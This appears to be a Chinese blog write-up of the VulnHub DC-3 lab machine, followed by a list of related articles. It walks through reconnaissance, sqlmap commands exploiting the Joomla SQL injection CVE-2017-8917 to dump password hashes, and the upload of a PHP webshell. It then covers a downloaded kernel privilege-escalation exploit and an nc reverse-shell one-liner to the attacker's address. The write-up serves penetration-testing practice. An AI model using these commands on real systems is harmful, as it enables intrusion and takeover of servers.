渗透测试靶场实战-DC-3

最新推荐文章于 2024-01-23 17:52:27 发布
最新推荐文章于 2024-01-23 17:52:27 发布
阅读量600 收藏 3
点赞数
文章标签: 网络安全 渗透测试 web 操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56523504/article/details/121004426
版权

渗透测试实战-DC-3

一,下载资料

链接:https://pan.baidu.com/s/1PknSNyAl0Me3wf_8SHenLQ
提取码:zcka

二,环境搭建:靶机:172.16.43.145

攻击机kali:172.16.43.70

三,信息收集

(1)当前网络活跃主机:nmap -sP 172.16.43.0/24 -oN nmap.sP

(2)扫描端口服务:nmap -A 172.16.43.141 -p 1-65535 -oN nmap.A

80 好像就开了80端口了
(3)在访问80网址:http://172.16.43.145    

         信息收集:是看不出来是什么框架

(4)kali工具:  攻防演练中:识别该网站的信息   用whatweb工具

输入命令:whatweb http://172.16.43.145

有各种关于网站的各种信息: apache Ubuntu Joomla开源内容管理

(5)利用joomscan工具进行网站的简单扫描

输入命令:joomscan --url http://172.16.43.145

没有防护墙,joomla目前版本和 扫描出来的一些目录 网站后台等等

(6)看看这里面的目录http://172.16.43.145/administrator/components/

(7)找到了网站的后台:http://172.16.43.145/administrator/modules

(8)可以尝试爆破,这一招,放到最后吧。看看有没有相关爆出的开源漏洞

具备sql注入漏洞:

输入命令:cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla-sqli.txt

有一个CVE-2017-8917

(9)可以sqlmap进行sql注入攻击了,一路点yes即可

sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

(10)爆出库中的表名

sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D --tables  -p list[fullordering]

(11)爆出库中的字段名

sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

(12)爆出字段名

sqlmap -u "http://172.16.43.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "name,password" --dump -p list[fullordering]

(13)将hash值写到一个文件里面去

 输入命令:vim user_password.txt

(14)利用john工具进行解密文件

   输入命令:John user_password.txt

后台账户:admin    密码:snoopy

(15)可以登录后台试一试

(16)可以找后台找一找

(17)看看可以不可以修改这些文件:上传个大马或者小马..需要找到绝对路径

猜测:一般网站模板文件,应该是放在根目录下的,172.16.43.145/templates

(18)试一试是不是在根目录

(19)找到这个路径有com_contact/这个文件

可以新建个文件xiaoma.php

(20)可以编辑这个xiaoma.php文件

编写完成

(21)访问一下:http://172.16.43.145/templates/beez3/xiaoma.php

由此可以访问成功

(22)用中国蚁剑进行连接

(23)看看虚拟终端

看看权限,是不是这个IP地址  sudo -l, history,netstat -antup 看看有没有什么可以提权的

四,提权

(1)查看内核版本信息 Linux 4.4.0-21

输入命令:uname -a

(2)查ubuntu 16.04版本

(3)下载到本地即可

     输入命令: searchsploit -m 39772.txt

(4)看看文件好像让我们下载个zip文件

Wget  进行下载:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

(5)下载的是一个zip文件,里面有两个文件,分别为 exploit.tar, crasher.tat,这次提权我们只需要用到 exploit.tar,所以把这个文件上传到靶机上。

(6)上传到靶机

(7)对文件进行编译

输入命令:./compile.sh

(8)开始提权:

 输入命令:./doubleput

(9)这里执行doubleput后虽然提示提权成功,但是查看还是www-data用户,继续进行

后来想到在靶机上反弹shell到攻击机上

(10)本地需要kali监听

输入命令:ncat -lvvp 44444

(11)反弹shell

输入命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.43.70 44444 >/tmp/f

(12)开启交互模式:

输入命令:python -c 'import pty;pty.spawn("/bin/bash")'

输入命令:./doubleput

(13)查看根目录

输入命令:cat the-flag.txt

总结:

1,根据80端口- whatweb工具查找相关版本漏洞 – joomscan工具查找相关漏洞

2,sql注入-后台登录-再去收集有用信息 -上传木马-  ls -a 敏感文件 sudo -l history命令

3提权:下载的是一个zip文件-反弹-执行命令提权

Tom_Jreey
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 2022
DC-3靶机渗透测试详细教程
渗透测试练习靶场汇总
热门推荐
Thunderclap的博客
07-01 1万+
渗透测试 练习常用靶场汇总
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建(超详细)
m0_69583059的博客
01-23 2215
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建5个比较常用的初学者入门靶场,演示搭建环境:win11系统+phpstudy。
24个常见渗透测试漏洞靶场列表
一只臭皮匠的博客
09-09 6645
0x01 在线靶场 BUUCTF在线评测:https://buuoj.cn Vulhub漏洞环境集合:https://vulhub.org 韩国Webhacking:https://webhacking.kr 重生信息安全在线靶场:https://bc.csxa.cn 网络信息安全攻防学习平台:http://hackinglab.cn 墨者学院在线靶场:https://www.mozhe.cn/bug 封神台在线演练靶场:https://hack.zkaq.cn/battle 安鸾渗透实战平台:http:
封神台靶场SQL注入——SQLmap简单使用
m0_72592923的博客
01-13 1076
封神台靶场SQL注入——SQLmap简单使用
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7462
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
【网络安全】DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 4812
借助DVWA靶场,对用户登录进行渗透测试
DC-1靶场搭建及渗透实战详细过程
baijiaofei的博客
08-24 1578
DC靶场实战过程
DC-3 渗透实战---sql注入、反弹shell、Ubuntu16.04double-fdput()提权
z2560088的博客
09-26 721
扫描靶机Ip根据靶机Mac确定靶机ip地址为 nmap -sP 192.168.160.0/24 或 netdiscover -r 192.168.160.0/24 确定ip地址为192.168.160.141 nmap 192.168.160.141 -sV -p- -A 发现80端口,和开源内容管理系统 joomla 连接http://192.168.160.141 joomscan --url http://192.168.160.141 发现joomla...
Vulnhub靶场实战———DC3
m0_67309561的博客
05-04 250
Vulnhub靶场通关
靶机4 DC-3(过程超详细)
honest_gg的博客
09-26 1030
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
【日常记录】offensive-ad(一个很好的内网机器)
人间体佐菲的博客
11-11 600
【日常记录】offensive-ad(一个很好的内网机器)
DC-3靶机渗透测试
weixin_48991458的博客
11-23 4084
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这里有个坑,VMware用户要官网下的第二个镜像才能发现IP地址,这里官方也有说明,可以仔细看一下,这里也贴出来了 两台主机设为NAT模式,靶机需要改一下设置,默认是桥接 开始操作 先信息收集,两台主机在一个局域网下用netdiscover扫起来,在结合mac地址很快就能发现靶机IP 靶机mac地址在虚拟机设置
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值